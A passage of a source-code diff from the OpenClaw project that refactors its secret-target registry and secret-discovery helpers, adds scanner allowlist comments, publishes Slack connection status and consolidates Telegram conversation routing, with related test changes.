"channels.telegram.accounts.*.botToken", configFile: "openclaw.json", pathPattern: "channels.telegram.accounts.*.botToken", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -476,7 +479,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.telegram.accounts.*.webhookSecret", configFile: "openclaw.json", pathPattern: "channels.telegram.accounts.*.webhookSecret", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -487,7 +490,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.telegram.botToken", configFile: "openclaw.json", pathPattern: "channels.telegram.botToken", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -498,7 +501,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.telegram.webhookSecret", configFile: "openclaw.json", pathPattern: "channels.telegram.webhookSecret", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -509,7 +512,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.zalo.accounts.*.botToken", configFile: "openclaw.json", pathPattern: "channels.zalo.accounts.*.botToken", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -520,7 +523,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.zalo.accounts.*.webhookSecret", configFile: "openclaw.json", pathPattern: "channels.zalo.accounts.*.webhookSecret", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -531,7 +534,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.zalo.botToken", configFile: "openclaw.json", pathPattern: "channels.zalo.botToken", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -542,7 +545,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "channels.zalo.webhookSecret", configFile: "openclaw.json", pathPattern: "channels.zalo.webhookSecret", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -553,7 +556,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "cron.webhookToken", configFile: "openclaw.json", pathPattern: "cron.webhookToken", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -564,7 +567,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "gateway.auth.token", configFile: "openclaw.json", pathPattern: "gateway.auth.token", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -575,7 +578,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "gateway.auth.password", configFile: "openclaw.json", pathPattern: "gateway.auth.password", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -586,7 +589,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "gateway.remote.password", configFile: "openclaw.json", pathPattern: "gateway.remote.password", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -597,7 +600,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "gateway.remote.token", configFile: "openclaw.json", pathPattern: "gateway.remote.token", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -608,7 +611,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "messages.tts.elevenlabs.apiKey", configFile: "openclaw.json", pathPattern: "messages.tts.elevenlabs.apiKey", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -619,7 +622,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "messages.tts.openai.apiKey", configFile: "openclaw.json", pathPattern: "messages.tts.openai.apiKey", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -631,7 +634,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetTypeAliases: ["models.providers.*.apiKey"], configFile: "openclaw.json", pathPattern: "models.providers.*.apiKey", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -645,7 +648,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetTypeAliases: ["skills.entries.*.apiKey"], configFile: "openclaw.json", pathPattern: "skills.entries.*.apiKey", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -656,7 +659,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "talk.apiKey", configFile: "openclaw.json", pathPattern: "talk.apiKey", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -667,7 +670,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "talk.providers.*.apiKey", configFile: "openclaw.json", pathPattern: "talk.providers.*.apiKey", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -678,7 +681,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "tools.web.search.apiKey", configFile: "openclaw.json", pathPattern: "tools.web.search.apiKey", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -689,7 +692,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "tools.web.search.gemini.apiKey", configFile: "openclaw.json", pathPattern: "tools.web.search.gemini.apiKey", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -700,7 +703,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "tools.web.search.grok.apiKey", configFile: "openclaw.json", pathPattern: "tools.web.search.grok.apiKey", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -711,7 +714,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "tools.web.search.kimi.apiKey", configFile: "openclaw.json", pathPattern: "tools.web.search.kimi.apiKey", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, @@ -722,7 +725,7 @@ const SECRET_TARGET_REGISTRY: SecretTargetRegistryEntry[] = [ targetType: "tools.web.search.perplexity.apiKey", configFile: "openclaw.json", pathPattern: "tools.web.search.perplexity.apiKey", - secretShape: "secret_input", + secretShape: SECRET_INPUT_SHAPE, expectedResolvedValue: "string", includeInPlan: true, includeInConfigure: true, diff --git a/src/secrets/target-registry-pattern.test.ts b/src/secrets/target-registry-pattern.test.ts index fe8668c4d1d..4739ca5776d 100644 --- a/src/secrets/target-registry-pattern.test.ts +++ b/src/secrets/target-registry-pattern.test.ts @@ -49,8 +49,8 @@ describe("target registry pattern helpers", () => { }, talk: { providers: { - openai: { apiKey: "oa" }, - anthropic: { apiKey: "an" }, + openai: { apiKey: "oa" }, // pragma: allowlist secret + anthropic: { apiKey: "an" }, // pragma: allowlist secret }, }, }; diff --git a/src/secrets/target-registry-pattern.ts b/src/secrets/target-registry-pattern.ts index d6c0970efaf..0504c3023e0 100644 --- a/src/secrets/target-registry-pattern.ts +++ b/src/secrets/target-registry-pattern.ts @@ -47,7 +47,8 @@ export function compileTargetRegistryEntry( const pathDynamicTokenCount = countDynamicPatternTokens(pathTokens); const refPathTokens = entry.refPathPattern ? parsePathPattern(entry.refPathPattern) : undefined; const refPathDynamicTokenCount = refPathTokens ? countDynamicPatternTokens(refPathTokens) : 0; - if (entry.secretShape === "sibling_ref" && !refPathTokens) { + const requiresSiblingRefPath = entry.secretShape === "sibling_ref"; // pragma: allowlist secret + if (requiresSiblingRefPath && !refPathTokens) { throw new Error(`Missing refPathPattern for sibling_ref target: ${entry.id}`); } if (refPathTokens && refPathDynamicTokenCount !== pathDynamicTokenCount) { diff --git a/src/secrets/target-registry-query.ts b/src/secrets/target-registry-query.ts index 5d46020d3b8..fcfdc694f85 100644 --- a/src/secrets/target-registry-query.ts +++ b/src/secrets/target-registry-query.ts @@ -74,6 +74,73 @@ function buildAuthProfileTargetIdIndex(): Map): Set | null { + if (targetIds === undefined) { + return null; + } + return new Set( + Array.from(targetIds) + .map((entry) => entry.trim()) + .filter((entry) => entry.length > 0), + ); +} + +function resolveDiscoveryEntries(params: { + allowedTargetIds: Set | null; + defaultEntries: CompiledTargetRegistryEntry[]; + entriesById: Map; +}): CompiledTargetRegistryEntry[] { + if (params.allowedTargetIds === null) { + return params.defaultEntries; + } + return Array.from(params.allowedTargetIds).flatMap( + (targetId) => params.entriesById.get(targetId) ?? [], + ); +} + +function discoverSecretTargetsFromEntries( + source: unknown, + discoveryEntries: CompiledTargetRegistryEntry[], +): DiscoveredConfigSecretTarget[] { + const out: DiscoveredConfigSecretTarget[] = []; + const seen = new Set(); + + for (const entry of discoveryEntries) { + const expanded = expandPathTokens(source, entry.pathTokens); + for (const match of expanded) { + const resolved = toResolvedPlanTarget(entry, match.segments, match.captures); + if (!resolved) { + continue; + } + const key = `${entry.id}:${resolved.pathSegments.join(".")}`; + if (seen.has(key)) { + continue; + } + seen.add(key); + const refValue = resolved.refPathSegments + ? getPath(source, resolved.refPathSegments) + : undefined; + out.push({ + entry, + path: resolved.pathSegments.join("."), + pathSegments: resolved.pathSegments, + ...(resolved.refPathSegments + ? { + refPathSegments: resolved.refPathSegments, + refPath: resolved.refPathSegments.join("."), + } + : {}), + value: match.value, + ...(resolved.providerId ? { providerId: resolved.providerId } : {}), + ...(resolved.accountId ? { accountId: resolved.accountId } : {}), + ...(resolved.refPathSegments ? { refValue } : {}), + }); + } + } + + return out; +} + function toResolvedPlanTarget( entry: CompiledTargetRegistryEntry, pathSegments: string[], @@ -182,58 +249,13 @@ export function discoverConfigSecretTargetsByIds( config: OpenClawConfig, targetIds?: Iterable, ): DiscoveredConfigSecretTarget[] { - const allowedTargetIds = - targetIds === undefined - ? null - : new Set( - Array.from(targetIds) - .map((entry) => entry.trim()) - .filter((entry) => entry.length > 0), - ); - const out: DiscoveredConfigSecretTarget[] = []; - const seen = new Set(); - - const discoveryEntries = - allowedTargetIds === null - ? OPENCLAW_COMPILED_SECRET_TARGETS - : Array.from(allowedTargetIds).flatMap( - (targetId) => OPENCLAW_TARGETS_BY_ID.get(targetId) ?? [], - ); - - for (const entry of discoveryEntries) { - const expanded = expandPathTokens(config, entry.pathTokens); - for (const match of expanded) { - const resolved = toResolvedPlanTarget(entry, match.segments, match.captures); - if (!resolved) { - continue; - } - const key = `${entry.id}:${resolved.pathSegments.join(".")}`; - if (seen.has(key)) { - continue; - } - seen.add(key); - const refValue = resolved.refPathSegments - ? getPath(config, resolved.refPathSegments) - : undefined; - out.push({ - entry, - path: resolved.pathSegments.join("."), - pathSegments: resolved.pathSegments, - ...(resolved.refPathSegments - ? { - refPathSegments: resolved.refPathSegments, - refPath: resolved.refPathSegments.join("."), - } - : {}), - value: match.value, - ...(resolved.providerId ? { providerId: resolved.providerId } : {}), - ...(resolved.accountId ? { accountId: resolved.accountId } : {}), - ...(resolved.refPathSegments ? { refValue } : {}), - }); - } - } - - return out; + const allowedTargetIds = normalizeAllowedTargetIds(targetIds); + const discoveryEntries = resolveDiscoveryEntries({ + allowedTargetIds, + defaultEntries: OPENCLAW_COMPILED_SECRET_TARGETS, + entriesById: OPENCLAW_TARGETS_BY_ID, + }); + return discoverSecretTargetsFromEntries(config, discoveryEntries); } export function discoverAuthProfileSecretTargets(store: unknown): DiscoveredConfigSecretTarget[] { @@ -244,58 +266,13 @@ export function discoverAuthProfileSecretTargetsByIds( store: unknown, targetIds?: Iterable, ): DiscoveredConfigSecretTarget[] { - const allowedTargetIds = - targetIds === undefined - ? null - : new Set( - Array.from(targetIds) - .map((entry) => entry.trim()) - .filter((entry) => entry.length > 0), - ); - const out: DiscoveredConfigSecretTarget[] = []; - const seen = new Set(); - - const discoveryEntries = - allowedTargetIds === null - ? AUTH_PROFILES_COMPILED_SECRET_TARGETS - : Array.from(allowedTargetIds).flatMap( - (targetId) => AUTH_PROFILES_TARGETS_BY_ID.get(targetId) ?? [], - ); - - for (const entry of discoveryEntries) { - const expanded = expandPathTokens(store, entry.pathTokens); - for (const match of expanded) { - const resolved = toResolvedPlanTarget(entry, match.segments, match.captures); - if (!resolved) { - continue; - } - const key = `${entry.id}:${resolved.pathSegments.join(".")}`; - if (seen.has(key)) { - continue; - } - seen.add(key); - const refValue = resolved.refPathSegments - ? getPath(store, resolved.refPathSegments) - : undefined; - out.push({ - entry, - path: resolved.pathSegments.join("."), - pathSegments: resolved.pathSegments, - ...(resolved.refPathSegments - ? { - refPathSegments: resolved.refPathSegments, - refPath: resolved.refPathSegments.join("."), - } - : {}), - value: match.value, - ...(resolved.providerId ? { providerId: resolved.providerId } : {}), - ...(resolved.accountId ? { accountId: resolved.accountId } : {}), - ...(resolved.refPathSegments ? { refValue } : {}), - }); - } - } - - return out; + const allowedTargetIds = normalizeAllowedTargetIds(targetIds); + const discoveryEntries = resolveDiscoveryEntries({ + allowedTargetIds, + defaultEntries: AUTH_PROFILES_COMPILED_SECRET_TARGETS, + entriesById: AUTH_PROFILES_TARGETS_BY_ID, + }); + return discoverSecretTargetsFromEntries(store, discoveryEntries); } export function listAuthProfileSecretTargetEntries(): SecretTargetRegistryEntry[] { diff --git a/src/secrets/target-registry-types.ts b/src/secrets/target-registry-types.ts index 0990f72a30d..e8c31d1c251 100644 --- a/src/secrets/target-registry-types.ts +++ b/src/secrets/target-registry-types.ts @@ -1,6 +1,6 @@ -export type SecretTargetConfigFile = "openclaw.json" | "auth-profiles.json"; -export type SecretTargetShape = "secret_input" | "sibling_ref"; -export type SecretTargetExpected = "string" | "string-or-object"; +export type SecretTargetConfigFile = "openclaw.json" | "auth-profiles.json"; // pragma: allowlist secret +export type SecretTargetShape = "secret_input" | "sibling_ref"; // pragma: allowlist secret +export type SecretTargetExpected = "string" | "string-or-object"; // pragma: allowlist secret export type AuthProfileType = "api_key" | "token"; export type SecretTargetRegistryEntry = { diff --git a/src/shared/frontmatter.ts b/src/shared/frontmatter.ts index 91e49017be6..ce042b18762 100644 --- a/src/shared/frontmatter.ts +++ b/src/shared/frontmatter.ts @@ -137,3 +137,18 @@ export function parseOpenClawManifestInstallBase( } return spec; } + +export function applyOpenClawManifestInstallCommonFields< + T extends { id?: string; label?: string; bins?: string[] }, +>(spec: T, parsed: Pick): T { + if (parsed.id) { + spec.id = parsed.id; + } + if (parsed.label) { + spec.label = parsed.label; + } + if (parsed.bins) { + spec.bins = parsed.bins; + } + return spec; +} diff --git a/src/slack/monitor/events/interactions.ts b/src/slack/monitor/events/interactions.ts index 4f92df32be7..deca761dd52 100644 --- a/src/slack/monitor/events/interactions.ts +++ b/src/slack/monitor/events/interactions.ts @@ -37,26 +37,7 @@ type SelectOption = { text?: { text?: string }; }; -type InteractionSelectionFields = { - actionType?: string; - blockId?: string; - inputKind?: "text" | "number" | "email" | "url" | "rich_text"; - value?: string; - selectedValues?: string[]; - selectedUsers?: string[]; - selectedChannels?: string[]; - selectedConversations?: string[]; - selectedLabels?: string[]; - selectedDate?: string; - selectedTime?: string; - selectedDateTime?: number; - inputValue?: string; - inputNumber?: number; - inputEmail?: string; - inputUrl?: string; - richTextValue?: unknown; - richTextPreview?: string; -}; +type InteractionSelectionFields = Partial; type InteractionSummary = InteractionSelectionFields & { interactionType?: "block_action" | "view_submission" | "view_closed"; diff --git a/src/slack/monitor/provider.reconnect.test.ts b/src/slack/monitor/provider.reconnect.test.ts index b3638a209bf..10fbab031a0 100644 --- a/src/slack/monitor/provider.reconnect.test.ts +++ b/src/slack/monitor/provider.reconnect.test.ts @@ -1,4 +1,4 @@ -import { describe, expect, it } from "vitest"; +import { describe, expect, it, vi } from "vitest"; import { __testing } from "./provider.js"; class FakeEmitter { @@ -22,6 +22,22 @@ class FakeEmitter { } describe("slack socket reconnect helpers", () => { + it("seeds event liveness when socket mode connects", () => { + const setStatus = vi.fn(); + + __testing.publishSlackConnectedStatus(setStatus); + + expect(setStatus).toHaveBeenCalledTimes(1); + expect(setStatus).toHaveBeenCalledWith( + expect.objectContaining({ + connected: true, + lastConnectedAt: expect.any(Number), + lastEventAt: expect.any(Number), + lastError: null, + }), + ); + }); + it("resolves disconnect waiter on socket disconnect event", async () => { const client = new FakeEmitter(); const app = { receiver: { client } }; diff --git a/src/slack/monitor/provider.ts b/src/slack/monitor/provider.ts index b7a10588e3f..12ba1020268 100644 --- a/src/slack/monitor/provider.ts +++ b/src/slack/monitor/provider.ts @@ -18,6 +18,7 @@ import { } from "../../config/runtime-group-policy.js"; import type { SessionScope } from "../../config/sessions.js"; import { normalizeResolvedSecretInputString } from "../../config/types.secrets.js"; +import { createConnectedChannelStatusPatch } from "../../gateway/channel-status-patches.js"; import { warn } from "../../globals.js"; import { computeBackoff, sleepWithAbort } from "../../infra/backoff.js"; import { installRequestBodyLimitGuard } from "../../infra/http-body.js"; @@ -65,6 +66,17 @@ function parseApiAppIdFromAppToken(raw?: string) { return match?.[1]?.toUpperCase(); } +function publishSlackConnectedStatus(setStatus?: (next: Record) => void) { + if (!setStatus) { + return; + } + const now = Date.now(); + setStatus({ + ...createConnectedChannelStatusPatch(now), + lastError: null, + }); +} + export async function monitorSlackProvider(opts: MonitorSlackOpts = {}) { const cfg = opts.config ?? loadConfig(); const runtime: RuntimeEnv = opts.runtime ?? createNonExitingRuntime(); @@ -390,6 +402,7 @@ export async function monitorSlackProvider(opts: MonitorSlackOpts = {}) { try { await app.start(); reconnectAttempts = 0; + publishSlackConnectedStatus(opts.setStatus); runtime.log?.("slack socket mode connected"); } catch (err) { // Auth errors (account_inactive, invalid_auth, etc.) are permanent — @@ -481,6 +494,7 @@ export async function monitorSlackProvider(opts: MonitorSlackOpts = {}) { export { isNonRecoverableSlackAuthError } from "./reconnect-policy.js"; export const __testing = { + publishSlackConnectedStatus, resolveSlackRuntimeGroupPolicy: resolveOpenProviderRuntimeGroupPolicy, resolveDefaultGroupPolicy, getSocketEmitter, diff --git a/src/telegram/bot-handlers.ts b/src/telegram/bot-handlers.ts index 6df34fe2c60..aaea84ecad7 100644 --- a/src/telegram/bot-handlers.ts +++ b/src/telegram/bot-handlers.ts @@ -16,7 +16,11 @@ import { shouldDebounceTextInbound } from "../channels/inbound-debounce-policy.j import { resolveChannelConfigWrites } from "../channels/plugins/config-writes.js"; import { loadConfig } from "../config/config.js"; import { writeConfigFile } from "../config/io.js"; -import { loadSessionStore, resolveStorePath } from "../config/sessions.js"; +import { + loadSessionStore, + resolveSessionStoreEntry, + resolveStorePath, +} from "../config/sessions.js"; import type { DmPolicy } from "../config/types.base.js"; import type { TelegramDirectConfig, @@ -50,6 +54,7 @@ import { resolveTelegramGroupAllowFromContext, } from "./bot/helpers.js"; import type { TelegramContext } from "./bot/types.js"; +import { resolveTelegramConversationRoute } from "./conversation-route.js"; import { enforceTelegramDmAccess } from "./dm-access.js"; import { evaluateTelegramGroupBaseAccess, @@ -268,9 +273,10 @@ export const registerTelegramHandlers = ({ isForum: boolean; messageThreadId?: number; resolvedThreadId?: number; + senderId?: string | number; }): { agentId: string; - sessionEntry: ReturnType[string]; + sessionEntry: ReturnType[string] | undefined; model?: string; } => { const resolvedThreadId = @@ -279,26 +285,20 @@ export const registerTelegramHandlers = ({ isForum: params.isForum, messageThreadId: params.messageThreadId, }); - const peerId = params.isGroup - ? buildTelegramGroupPeerId(params.chatId, resolvedThreadId) - : String(params.chatId); - const parentPeer = buildTelegramParentPeer({ + const dmThreadId = !params.isGroup ? params.messageThreadId : undefined; + const topicThreadId = resolvedThreadId ?? dmThreadId; + const { topicConfig } = resolveTelegramGroupConfig(params.chatId, topicThreadId); + const { route } = resolveTelegramConversationRoute({ + cfg, + accountId, + chatId: params.chatId, isGroup: params.isGroup, resolvedThreadId, - chatId: params.chatId, - }); - const route = resolveAgentRoute({ - cfg, - channel: "telegram", - accountId, - peer: { - kind: params.isGroup ? "group" : "direct", - id: peerId, - }, - parentPeer, + replyThreadId: topicThreadId, + senderId: params.senderId, + topicAgentId: topicConfig?.agentId, }); const baseSessionKey = route.sessionKey; - const dmThreadId = !params.isGroup ? params.messageThreadId : undefined; const threadKeys = dmThreadId != null ? resolveThreadSessionKeys({ baseSessionKey, threadId: `${params.chatId}:${dmThreadId}` }) @@ -306,7 +306,7 @@ export const registerTelegramHandlers = ({ const sessionKey = threadKeys?.sessionKey ?? baseSessionKey; const storePath = resolveStorePath(cfg.session?.store, { agentId: route.agentId }); const store = loadSessionStore(storePath); - const entry = store[sessionKey]; + const entry = resolveSessionStoreEntry({ store, sessionKey }).existing; const storedOverride = resolveStoredModelOverride({ sessionEntry: entry, sessionStore: store, diff --git a/src/telegram/bot-message-context.ts b/src/telegram/bot-message-context.ts index 72cfc527661..ab628dc0e0a 100644 --- a/src/telegram/bot-message-context.ts +++ b/src/telegram/bot-message-context.ts @@ -1,8 +1,5 @@ import type { Bot } from "grammy"; -import { - ensureConfiguredAcpRouteReady, - resolveConfiguredAcpRoute, -} from "../acp/persistent-bindings.route.js"; +import { ensureConfiguredAcpRouteReady } from "../acp/persistent-bindings.route.js"; import { resolveAckReaction } from "../agents/identity.js"; import { findModelInCatalog, @@ -42,19 +39,7 @@ import type { } from "../config/types.js"; import { logVerbose, shouldLogVerbose } from "../globals.js"; import { recordChannelActivity } from "../infra/channel-activity.js"; -import { getSessionBindingService } from "../infra/outbound/session-binding-service.js"; -import { - buildAgentSessionKey, - pickFirstExistingAgentId, - resolveAgentRoute, - type ResolvedAgentRoute, -} from "../routing/resolve-route.js"; -import { - DEFAULT_ACCOUNT_ID, - buildAgentMainSessionKey, - resolveAgentIdFromSessionKey, - resolveThreadSessionKeys, -} from "../routing/session-key.js"; +import { DEFAULT_ACCOUNT_ID, resolveThreadSessionKeys } from "../routing/session-key.js"; import { resolvePinnedMainDmOwnerFromAllowlist } from "../security/dm-policy-shared.js"; import { withTelegramApiErrorLogging } from "./api-logging.js"; import { @@ -67,10 +52,8 @@ import { buildGroupLabel, buildSenderLabel, buildSenderName, - resolveTelegramDirectPeerId, buildTelegramGroupFrom, buildTelegramGroupPeerId, - buildTelegramParentPeer, buildTypingThreadParams, resolveTelegramMediaPlaceholder, expandTextLinks, @@ -81,6 +64,7 @@ import { resolveTelegramThreadSpec, } from "./bot/helpers.js"; import type { StickerMetadata, TelegramContext } from "./bot/types.js"; +import { resolveTelegramConversationRoute } from "./conversation-route.js"; import { enforceTelegramDmAccess } from "./dm-access.js"; import { isTelegramForumServiceMessage } from "./forum-service-message.js"; import { evaluateTelegramGroupBaseAccess } from "./group-access.js"; @@ -209,89 +193,21 @@ export const buildTelegramMessageContext = async ({ !isGroup && groupConfig && "dmPolicy" in groupConfig ? (groupConfig.dmPolicy ?? dmPolicy) : dmPolicy; - const peerId = isGroup - ? buildTelegramGroupPeerId(chatId, resolvedThreadId) - : resolveTelegramDirectPeerId({ chatId, senderId }); - const parentPeer = buildTelegramParentPeer({ isGroup, resolvedThreadId, chatId }); // Fresh config for bindings lookup; other routing inputs are payload-derived. const freshCfg = loadConfig(); - let route: ResolvedAgentRoute = resolveAgentRoute({ + let { route, configuredBinding, configuredBindingSessionKey } = resolveTelegramConversationRoute({ cfg: freshCfg, - channel: "telegram", accountId: account.accountId, - peer: { - kind: isGroup ? "group" : "direct", - id: peerId, - }, - parentPeer, + chatId, + isGroup, + resolvedThreadId, + replyThreadId, + senderId, + topicAgentId: topicConfig?.agentId, }); - // Per-topic agentId override: re-derive session key under the topic's agent. - const rawTopicAgentId = topicConfig?.agentId?.trim(); - if (rawTopicAgentId) { - // Validate agentId against configured agents; falls back to default if not found. - const topicAgentId = pickFirstExistingAgentId(freshCfg, rawTopicAgentId); - const overrideSessionKey = buildAgentSessionKey({ - agentId: topicAgentId, - channel: "telegram", - accountId: account.accountId, - peer: { kind: isGroup ? "group" : "direct", id: peerId }, - dmScope: freshCfg.session?.dmScope, - identityLinks: freshCfg.session?.identityLinks, - }).toLowerCase(); - const overrideMainSessionKey = buildAgentMainSessionKey({ - agentId: topicAgentId, - }).toLowerCase(); - route = { - ...route, - agentId: topicAgentId, - sessionKey: overrideSessionKey, - mainSessionKey: overrideMainSessionKey, - }; - logVerbose( - `telegram: per-topic agent override: topic=${resolvedThreadId ?? dmThreadId} agent=${topicAgentId} sessionKey=${overrideSessionKey}`, - ); - } - const configuredRoute = resolveConfiguredAcpRoute({ - cfg: freshCfg, - route, - channel: "telegram", - accountId: account.accountId, - conversationId: peerId, - parentConversationId: isGroup ? String(chatId) : undefined, - }); - let configuredBinding = configuredRoute.configuredBinding; - let configuredBindingSessionKey = configuredRoute.boundSessionKey ?? ""; - route = configuredRoute.route; - const threadBindingConversationId = - replyThreadId != null - ? `${chatId}:topic:${replyThreadId}` - : !isGroup - ? String(chatId) - : undefined; - if (threadBindingConversationId) { - const threadBinding = getSessionBindingService().resolveByConversation({ - channel: "telegram", - accountId: account.accountId, - conversationId: threadBindingConversationId, - }); - const boundSessionKey = threadBinding?.targetSessionKey?.trim(); - if (threadBinding && boundSessionKey) { - route = { - ...route, - sessionKey: boundSessionKey, - agentId: resolveAgentIdFromSessionKey(boundSessionKey), - matchedBy: "binding.channel", - }; - configuredBinding = null; - configuredBindingSessionKey = ""; - getSessionBindingService().touch(threadBinding.bindingId); - logVerbose( - `telegram: routed via bound conversation ${threadBindingConversationId} -> ${boundSessionKey}`, - ); - } - } - const requiresExplicitAccountBinding = (candidate: ResolvedAgentRoute): boolean => - candidate.accountId !== DEFAULT_ACCOUNT_ID && candidate.matchedBy === "default"; + const requiresExplicitAccountBinding = ( + candidate: ReturnType["route"], + ): boolean => candidate.accountId !== DEFAULT_ACCOUNT_ID && candidate.matchedBy === "default"; // Fail closed for named Telegram accounts when route resolution falls back to // default-agent routing. This prevents cross-account DM/session contamination. if (requiresExplicitAccountBinding(route)) { diff --git a/src/telegram/bot-message-dispatch.test.ts b/src/telegram/bot-message-dispatch.test.ts index b0411e65e70..2e6cf158f10 100644 --- a/src/telegram/bot-message-dispatch.test.ts +++ b/src/telegram/bot-message-dispatch.test.ts @@ -30,10 +30,14 @@ vi.mock("./send.js", () => ({ editMessageTelegram, })); -vi.mock("../config/sessions.js", async () => ({ - loadSessionStore, - resolveStorePath, -})); +vi.mock("../config/sessions.js", async (importOriginal) => { + const actual = await importOriginal(); + return { + ...actual, + loadSessionStore, + resolveStorePath, + }; +}); vi.mock("./sticker-cache.js", () => ({ cacheSticker: vi.fn(), diff --git a/src/telegram/bot-message-dispatch.ts b/src/telegram/bot-message-dispatch.ts index 0433fed9f7a..e6f2f65218d 100644 --- a/src/telegram/bot-message-dispatch.ts +++ b/src/telegram/bot-message-dispatch.ts @@ -15,7 +15,11 @@ import { logAckFailure, logTypingFailure } from "../channels/logging.js"; import { createReplyPrefixOptions } from "../channels/reply-prefix.js"; import { createTypingCallbacks } from "../channels/typing.js"; import { resolveMarkdownTableMode } from "../config/markdown-tables.js"; -import { loadSessionStore, resolveStorePath } from "../config/sessions.js"; +import { + loadSessionStore, + resolveSessionStoreEntry, + resolveStorePath, +} from "../config/sessions.js"; import type { OpenClawConfig, ReplyToMode, TelegramAccountConfig } from "../config/types.js"; import { danger, logVerbose } from "../globals.js"; import { getAgentScopedMediaLocalRoots } from "../media/local-roots.js"; @@ -117,7 +121,7 @@ function resolveTelegramReasoningLevel(params: { try { const storePath = resolveStorePath(cfg.session?.store, { agentId }); const store = loadSessionStore(storePath, { skipCache: true }); - const entry = store[sessionKey.toLowerCase()] ?? store[sessionKey]; + const entry = resolveSessionStoreEntry({ store, sessionKey }).existing; const level = entry?.reasoningLevel; if (level === "on" || level === "stream") { return level; diff --git a/src/telegram/bot-native-commands.session-meta.test.ts b/src/telegram/bot-native-commands.session-meta.test.ts index cbf6a83be15..9f0a9f4116d 100644 --- a/src/telegram/bot-native-commands.session-meta.test.ts +++ b/src/telegram/bot-native-commands.session-meta.test.ts @@ -1,6 +1,9 @@ import { beforeEach, describe, expect, it, vi } from "vitest"; import type { OpenClawConfig } from "../config/config.js"; -import { registerTelegramNativeCommands } from "./bot-native-commands.js"; +import { + registerTelegramNativeCommands, + type RegisterTelegramHandlerParams, +} from "./bot-native-commands.js"; import { createNativeCommandTestParams } from 